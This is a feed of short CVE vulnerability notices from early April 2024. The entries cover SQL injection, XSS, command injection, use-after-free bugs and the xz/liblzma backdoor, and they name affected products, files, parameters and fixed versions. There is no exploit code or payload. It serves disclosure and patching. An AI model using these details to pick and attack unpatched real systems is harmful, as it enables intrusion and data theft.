🚨 CVE-2024-29006By default the CloudStack management server honours the x-forwarded-for HTTP header and logs it as the source IP of an API request. This could lead to authentication bypass and other operational problems should an attacker decide to spoof their IP address this way. Users are recommended to upgrade to CloudStack version 4.18.1.1 or 4.19.0.1, which fixes this issue.🎖@cveNotify |
|
| 2024-04-04 08:37:25 |
🚨 CVE-2020-25730Cross Site Scripting (XSS) vulnerability in ZoneMinder before version 1.34.21, allows remote attackers execute arbitrary code, escalate privileges, and obtain sensitive information via PHP_SELF component in classic/views/download.php.🎖@cveNotify |
|
| 2024-04-04 08:37:24 |
🚨 CVE-2022-4742A vulnerability, which was classified as critical, has been found in json-pointer up to 0.6.1. Affected by this issue is the function set of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. Upgrading to version 0.6.2 is able to address this issue. The patch is identified as 859c9984b6c407fc2d5a0a7e47c7274daa681941. It is recommended to upgrade the affected component. VDB-216794 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-04 07:37:26 |
🚨 CVE-2023-25200An HTML injection vulnerability exists in the MT Safeline X-Ray X3310 webserver version NXG 19.05 that enables a remote attacker to render malicious HTML and obtain sensitive information in a victim's browser.🎖@cveNotify |
|
| 2024-04-04 07:37:25 |
🚨 CVE-2023-25199A reflected cross-site scripting (XSS) vulnerability exists in the MT Safeline X-Ray X3310 webserver version NXG 19.05 that enables a remote attacker to execute JavaScript code and obtain sensitive information in a victim's browser.🎖@cveNotify |
|
| 2024-04-04 06:37:25 |
🚨 CVE-2024-20848Improper Input Validation vulnerability in text parsing implementation of libsdffextractor prior to SMR Apr-2024 Release 1 allows local attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-04-04 06:37:24 |
🚨 CVE-2023-38408The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.🎖@cveNotify |
|
| 2024-04-04 05:37:26 |
🚨 CVE-2024-31025SQL Injection vulnerability in ECshop 4.x allows an attacker to obtain sensitive information via the file/article.php component.🎖@cveNotify |
|
| 2024-04-04 04:37:24 |
🚨 CVE-2024-3273** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-04 03:37:25 |
🚨 CVE-2024-2830The WordPress Tag and Category Manager – AI Autotagger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'st_tag_cloud' shortcode in all versions up to, and including, 3.13.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-04 03:37:24 |
🚨 CVE-2024-2008The Modal Popup Box – Popup Builder, Show Offers And News in Popup plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5.2 via deserialization of untrusted input in the awl_modal_popup_box_shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-04-04 02:37:30 |
🚨 CVE-2024-3022The BookingPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient filename validation in the 'bookingpress_process_upload' function in all versions up to, and including 1.0.87. This allows an authenticated attacker with administrator-level capabilities or higher to upload arbitrary files on the affected site's server, enabling remote code execution.🎖@cveNotify |
|
| 2024-04-04 02:37:26 |
🚨 CVE-2024-2803The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-04 02:37:25 |
🚨 CVE-2023-7158A vulnerability was found in MicroPython up to 1.21.0. It has been classified as critical. Affected is the function slice_indices of the file objslice.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.22.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249180.🎖@cveNotify |
|
| 2024-04-04 02:37:24 |
🚨 CVE-2023-7152A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-04 01:37:25 |
🚨 CVE-2024-25579OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, WRC-2533GS2V-B v1.62 and earlier, WRC-X3200GST3-B v1.25 and earlier, and WRC-G01-W v1.24 and earlier.🎖@cveNotify |
|
| 2024-04-04 01:37:24 |
🚨 CVE-2024-21798ELECOM wireless LAN routers contain a cross-site scripting vulnerability. Assume that a malicious administrative user configures the affected product with specially crafted content. When another administrative user logs in and operates the product, an arbitrary script may be executed on the web browser. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, WRC-2533GS2V-B v1.62 and earlier, WRC-X3200GST3-B v1.25 and earlier, and WRC-G01-W v1.24 and earlier.🎖@cveNotify |
|
| 2024-04-04 00:37:27 |
🚨 CVE-2024-26258OS command injection vulnerability in WRC-X3200GST3-B v1.25 and earlier, and WRC-G01-W v1.24 and earlier allows a network-adjacent attacker with credentials to execute arbitrary OS commands by sending a specially crafted request to the product.🎖@cveNotify |
|
| 2024-04-04 00:37:26 |
🚨 CVE-2024-25568OS command injection vulnerability in WRC-X3200GST3-B v1.25 and earlier, and WRC-G01-W v1.24 and earlier allows a network-adjacent unauthenticated attacker to execute arbitrary OS commands by sending a specially crafted request to the product.🎖@cveNotify |
|
| 2024-04-03 23:37:25 |
🚨 CVE-2024-3270A vulnerability classified as problematic was found in ThingsBoard up to 3.6.2. This vulnerability affects unknown code of the component AdvancedFeature. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259282 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure and replied to be planning to fix this issue in version 3.7.🎖@cveNotify |
|
| 2024-04-03 23:37:24 |
🚨 CVE-2024-30265Collabora Online is a collaborative online office suite based on LibreOffice technology. Any deployment of voilà dashboard allow local file inclusion. Any file on a filesystem that is readable by the user that runs the voilà dashboard server can be downloaded by someone with network access to the server. Whether this still requires authentication depends on how voilà is deployed. This issue has been patched in 0.2.17, 0.3.8, 0.4.4 and 0.5.6.🎖@cveNotify |
|
| 2024-04-03 22:37:26 |
🚨 CVE-2024-29413Cross Site Scripting vulnerability in Webasyst v.2.9.9 allows a remote attacker to run arbitrary code via the Instant messenger field in the Contact info function.🎖@cveNotify |
|
| 2024-04-03 22:37:25 |
🚨 CVE-2024-27705Cross Site Scripting vulnerability in Leantime v3.0.6 allows attackers to execute arbitrary code via upload of crafted PDF file to the files/browse endpoint.🎖@cveNotify |
|
| 2024-04-03 22:37:24 |
🚨 CVE-2023-52043An issue in D-Link COVR 1100, 1102, 1103 AC1200 Dual-Band Whole-Home Mesh Wi-Fi System (Hardware Rev B1) truncates Wireless Access Point Passwords (WPA-PSK) allowing an attacker to gain unauthorized network access via weak authentication controls.🎖@cveNotify |
|
| 2024-04-03 21:37:24 |
🚨 CVE-2024-25410flusity-CMS 2.33 is vulnerable to Unrestricted Upload of File with Dangerous Type in update_setting.php.🎖@cveNotify |
|
| 2024-04-03 20:37:25 |
🚨 CVE-2024-3181Concrete CMS version 9 prior to 9.2.8 and previous versions prior to 8.5.16 are vulnerable to Stored XSS in the Search Field. Prior to the fix, stored XSS could be executed by an administrator changing a filter to which a rogue administrator had previously added malicious code. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Thanks Alexey Solovyev for reporting🎖@cveNotify |
|
| 2024-04-03 20:37:24 |
🚨 CVE-2024-3179Concrete CMS version 9 before 9.2.8 and previous versions before 8.5.16 are vulnerable to Stored XSS in the Custom Class page editing. Prior to the fix, a rogue administrator could insert malicious code in the custom class field due to insufficient validation of administrator provided data. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Thanks Alexey Solovyev for reporting.🎖@cveNotify |
|
| 2024-04-03 19:37:32 |
🚨 CVE-2024-3180Concrete CMS version 9 below 9.2.8 and previous versions below 8.5.16 is vulnerable to Stored XSS in blocks of type file. Prior to fix, stored XSS could be caused by a rogue administrator adding malicious code to the link-text field when creating a block of type file. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Thanks Alexey Solovyev for reporting.🎖@cveNotify |
|
| 2024-04-03 19:37:25 |
🚨 CVE-2024-2753Concrete CMS version 9 before 9.2.8 and previous versions prior to 8.5.16 is vulnerable to Stored XSS on the calendar color settings screen since Information input by the user is output without escaping. A rogue administrator could inject malicious javascript into the Calendar Color Settings screen which might be executed when users visit the affected page. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 2.0 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N&version=3.1 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator Thank you Rikuto Tauchi for reporting🎖@cveNotify |
|
| 2024-04-03 19:37:24 |
🚨 CVE-2024-2653amphp/http will collect CONTINUATION frames in an unbounded buffer and will not check a limit until it has received the set END_HEADERS flag, resulting in an OOM crash.🎖@cveNotify |
|
| 2024-04-03 18:37:25 |
🚨 CVE-2024-31380Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Oxygen Builder allows Code Injection.This issue affects Oxygen Builder: from n/a through 4.8.2.🎖@cveNotify |
|
| 2024-04-03 18:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-04-03 18:07:25 |
🚨 CVE-2018-11307An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6.🎖@cveNotify |
|
| 2024-04-03 13:37:49 |
🚨 CVE-2024-25046IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service by an authenticated user using a specially crafted query. IBM X-Force ID: 282953.🎖@cveNotify |
|
| 2024-04-03 13:37:42 |
🚨 CVE-2024-22360IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to a denial of service with a specially crafted query on certain columnar tables. IBM X-Force ID: 280905.🎖@cveNotify |
|
| 2024-04-03 13:37:41 |
🚨 CVE-2023-38729IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server)10.5, 11.1, and 11.5 is vulnerable to sensitive information disclosure when using ADMIN_CMD with IMPORT or EXPORT. IBM X-Force ID: 262259.🎖@cveNotify |
|
| 2024-04-03 13:37:37 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-04-03 13:37:36 |
🚨 CVE-2024-1979A vulnerability was found in Quarkus. In certain conditions related to the CI process, git credentials could be inadvertently published, which could put the git repository at risk.🎖@cveNotify |
|
| 2024-04-03 13:07:42 |
🚨 CVE-2024-30344Foxit PDF Reader AcroForm Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Acroforms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22733.🎖@cveNotify |
|
| 2024-04-03 13:07:35 |
🚨 CVE-2024-27605Alldata V0.4.6 is vulnerable to Insecure Permissions. Using users (test) can query information about the users in the system.🎖@cveNotify |
|
| 2024-04-03 13:07:34 |
🚨 CVE-2024-27602Alldata V0.4.6 is vulnerable to Incorrect Access Control. A total of many modules interface documents have been leaked.For example, the /api/system/v2/api-docs module.🎖@cveNotify |
|
| 2024-04-03 13:07:33 |
🚨 CVE-2024-25075An issue was discovered in Softing uaToolkit Embedded before 1.41.1. When a subscription with a very low MaxNotificationPerPublish parameter is created, a publish response is mishandled, leading to memory consumption. When that happens often enough, the device will be out of memory, i.e., a denial of service.🎖@cveNotify |
|
| 2024-04-03 12:37:34 |
🚨 CVE-2024-3255A vulnerability, which was classified as critical, was found in SourceCodester Internship Portal Management System 1.0. Affected is an unknown function of the file admin/edit_admin_query.php. The manipulation of the argument username/password/name/admin_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259104.🎖@cveNotify |
|
| 2024-04-03 12:37:31 |
🚨 CVE-2024-3254A vulnerability, which was classified as critical, has been found in SourceCodester Internship Portal Management System 1.0. This issue affects some unknown processing of the file admin/edit_admin.php. The manipulation of the argument admin_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259103.🎖@cveNotify |
|
| 2024-04-03 12:37:30 |
🚨 CVE-2024-29477Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.🎖@cveNotify |
|
| 2024-04-03 12:37:29 |
🚨 CVE-2024-28782IBM QRadar Suite Software 1.10.12.0 through 1.10.18.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores user credentials in plain clear text which can be read by an authenticated user. IBM X-Force ID: 285698.🎖@cveNotify |
|
| 2024-04-03 12:37:26 |
🚨 CVE-2024-27972Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Very Good Plugins WP Fusion Lite allows Command Injection.This issue affects WP Fusion Lite: from n/a through 3.41.24.🎖@cveNotify |
|
| 2024-04-03 12:37:25 |
🚨 CVE-2024-25918Unrestricted Upload of File with Dangerous Type vulnerability in InstaWP Team InstaWP Connect allows Code Injection.This issue affects InstaWP Connect: from n/a through 0.1.0.8.🎖@cveNotify |
|
| 2024-04-03 12:37:24 |
🚨 CVE-2020-15368AsrDrv103.sys in the ASRock RGB Driver does not properly restrict access from user space, as demonstrated by triggering a triple fault via a request to zero CR3.🎖@cveNotify |
|
| 2024-04-03 11:37:25 |
🚨 CVE-2024-3142A vulnerability was found in Clavister E10 and E80 up to 14.00.10 and classified as problematic. This issue affects some unknown processing of the component Setting Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 14.00.11 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-258917 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-03 11:37:24 |
🚨 CVE-2024-3141A vulnerability has been found in Clavister E10 and E80 up to 14.00.10 and classified as problematic. This vulnerability affects unknown code of the file /?Page=Node&OBJ=/System/AdvancedSettings/DeviceSettings/MiscSettings of the component Misc Settings Page. The manipulation of the argument WatchdogTimerTime/BufFloodRebootTime/MaxPipeUsers/AVCache Lifetime/HTTPipeliningMaxReq/Reassembly MaxConnections/Reassembly MaxProcessingMem/ScrSaveTime leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 14.00.11 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-258916.🎖@cveNotify |
|
| 2024-04-03 10:37:25 |
🚨 CVE-2024-3252A vulnerability classified as critical has been found in SourceCodester Internship Portal Management System 1.0. This affects an unknown part of the file admin/check_admin.php. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259101 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-03 10:37:24 |
🚨 CVE-2024-0172Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.🎖@cveNotify |
|
| 2024-04-03 08:37:28 |
🚨 CVE-2024-28589An issue was discovered in Axigen Mail Server for Windows versions 10.5.18 and before, allows local low-privileged attackers to execute arbitrary code and escalate privileges via insecure DLL loading from a world-writable directory during service initialization.🎖@cveNotify |
|
| 2024-04-03 08:37:27 |
🚨 CVE-2023-34423Survey Maker prior to 3.6.4 contains a stored cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is logging in to the website using the product with the administrative privilege.🎖@cveNotify |
|
| 2024-04-03 07:37:24 |
🚨 CVE-2024-24506Cross Site Scripting (XSS) vulnerability in Lime Survey Community Edition Version v.5.3.32+220817, allows remote attackers to execute arbitrary code via the Administrator email address parameter in the General Setting function.🎖@cveNotify |
|
| 2024-04-03 06:37:25 |
🚨 CVE-2024-30998SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component.🎖@cveNotify |
|
| 2024-04-03 06:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-03 05:37:25 |
🚨 CVE-2024-31011Arbitrary file write vulnerability in beescms v.4.0, allows a remote attacker to execute arbitrary code via a file path that was not isolated and the suffix was not verified in admin_template.php.🎖@cveNotify |
|
| 2024-04-03 05:37:24 |
🚨 CVE-2024-2322The WooCommerce Cart Abandonment Recovery WordPress plugin before 1.2.27 does not have CSRF check in its bulk actions, which could allow attackers to make logged in admins delete arbitrary email templates as well as delete and unsubscribe users from abandoned orders via CSRF attacks.🎖@cveNotify |
|
| 2024-04-03 04:37:32 |
🚨 CVE-2024-31012An issue was discovered in SEMCMS v.4.8, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the upload.php file.🎖@cveNotify |
|
| 2024-04-03 04:37:26 |
🚨 CVE-2024-31010SQL injection vulnerability in SEMCMS v.4.8, allows a remote attacker to obtain sensitive information via the ID parameter in Banner.php.🎖@cveNotify |
|
| 2024-04-03 04:37:25 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-03 04:37:24 |
🚨 CVE-2024-26651In the Linux kernel, the following vulnerability has been resolved:sr9800: Add check for usbnet_get_endpointsAdd check for usbnet_get_endpoints() and return the error if it failsin order to transfer the error.🎖@cveNotify |
|
| 2024-04-03 03:37:35 |
🚨 CVE-2024-3162The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Testimonial Widget Attributes in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-03 03:37:31 |
🚨 CVE-2024-28836An issue was discovered in Mbed TLS 3.5.x before 3.6.0. When negotiating the TLS version on the server side, it can fall back to the TLS 1.2 implementation of the protocol if it is disabled. If the TLS 1.2 implementation was disabled at build time, a TLS 1.2 client could put a TLS 1.3-only server into an infinite loop processing a TLS 1.2 ClientHello, resulting in a denial of service. If the TLS 1.2 implementation was disabled at runtime, a TLS 1.2 client can successfully establish a TLS 1.2 connection with the server.🎖@cveNotify |
|
| 2024-04-03 03:37:30 |
🚨 CVE-2024-28219In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.🎖@cveNotify |
|
| 2024-04-03 03:37:29 |
🚨 CVE-2024-26495Cross Site Scripting (XSS) vulnerability in Friendica versions after v.2023.12, allows a remote attacker to execute arbitrary code and obtain sensitive information via the BBCode tags in the post content and post comments function.🎖@cveNotify |
|
| 2024-04-03 03:37:26 |
🚨 CVE-2024-24724Gibbon through 26.0.00 allows /modules/School%20Admin/messengerSettings.php Server Side Template Injection leading to Remote Code Execution because input is passed to the Twig template engine (messengerSettings.php) without sanitization.🎖@cveNotify |
|
| 2024-04-03 03:37:25 |
🚨 CVE-2024-31033JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class. NOTE: the vendor disputes this because the "ignores" behavior cannot occur (in any version) unless there is a user error in how JJWT is used, and because the version that was actually tested must have been more than six years out of date.🎖@cveNotify |
|
| 2024-04-03 03:37:24 |
🚨 CVE-2022-45868The web-based admin console in H2 Database Engine before 2.2.220 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that." Nonetheless, the issue was fixed in 2.2.220.🎖@cveNotify |
|
| 2024-04-03 02:37:30 |
🚨 CVE-2024-3225A vulnerability was found in SourceCodester PHP Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file edit-task.php. The manipulation of the argument task_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259070 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-03 02:37:26 |
🚨 CVE-2023-47715IBM Storage Protect Plus Server 10.1.0 through 10.1.16 could allow an authenticated user with read-only permissions to add or delete entries from an existing HyperVisor configuration. IBM X-Force ID: 271538.🎖@cveNotify |
|
| 2024-04-03 02:37:25 |
🚨 CVE-2024-22332The IBM Integration Bus for z/OS 10.1 through 10.1.0.2 AdminAPI is vulnerable to a denial of service due to file system exhaustion. IBM X-Force ID: 279972.🎖@cveNotify |
|
| 2024-04-03 02:37:24 |
🚨 CVE-2024-22318IBM i Access Client Solutions (ACS) 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 is vulnerable to NT LAN Manager (NTLM) hash disclosure by an attacker modifying UNC capable paths within ACS configuration files to point to a hostile server. If NTLM is enabled, the Windows operating system will try to authenticate using the current user's session. The hostile server could capture the NTLM hash information to obtain the user's credentials. IBM X-Force ID: 279091.🎖@cveNotify |
|
| 2024-04-03 01:37:24 |
🚨 CVE-2024-3223A vulnerability, which was classified as critical, was found in SourceCodester PHP Task Management System 1.0. Affected is an unknown function of the file admin-manage-user.php. The manipulation of the argument admin_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259068.🎖@cveNotify |
|
| 2024-04-03 00:37:32 |
🚨 CVE-2024-3221A vulnerability classified as critical was found in SourceCodester PHP Task Management System 1.0. This vulnerability affects unknown code of the file attendance-info.php. The manipulation of the argument user_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259066 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-03 00:37:25 |
🚨 CVE-2024-1725A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.🎖@cveNotify |
|
| 2024-04-03 00:37:24 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-04-02 23:37:30 |
🚨 CVE-2024-3209A vulnerability was found in UPX up to 4.2.2. It has been rated as critical. This issue affects the function get_ne64 of the file bele.h. The manipulation leads to heap-based buffer overflow. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259055. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-02 23:37:25 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-02 23:37:24 |
🚨 CVE-2024-23672Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-04-02 22:37:25 |
🚨 CVE-2024-3203A vulnerability, which was classified as critical, was found in c-blosc2 up to 2.13.2. Affected is the function ndlz8_decompress of the file /src/c-blosc2/plugins/codecs/ndlz/ndlz8x8.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259050 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-02 22:37:24 |
🚨 CVE-2024-29434An issue in the system image upload interface of Alldata v0.4.6 allows attackers to execute a directory traversal when uploading a file.🎖@cveNotify |
|
| 2024-04-02 21:37:32 |
🚨 CVE-2024-30344Foxit PDF Reader AcroForm Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Acroforms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22733.🎖@cveNotify |
|
| 2024-04-02 21:37:26 |
🚨 CVE-2024-29432Alldata v0.4.6 was discovered to contain a SQL injection vulnerability via the tablename parameter at /data/masterdata/datas.🎖@cveNotify |
|
| 2024-04-02 21:37:25 |
🚨 CVE-2024-27602Alldata V0.4.6 is vulnerable to Incorrect Access Control. A total of many modules interface documents have been leaked.For example, the /api/system/v2/api-docs module.🎖@cveNotify |
|
| 2024-04-02 21:37:24 |
🚨 CVE-2024-25075An issue was discovered in Softing uaToolkit Embedded before 1.41.1. When a subscription with a very low MaxNotificationPerPublish parameter is created, a publish response is mishandled, leading to memory consumption. When that happens often enough, the device will be out of memory, i.e., a denial of service.🎖@cveNotify |
|
| 2024-04-02 20:37:43 |
🚨 CVE-2024-30343Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22721.🎖@cveNotify |
|
| 2024-04-02 20:37:42 |
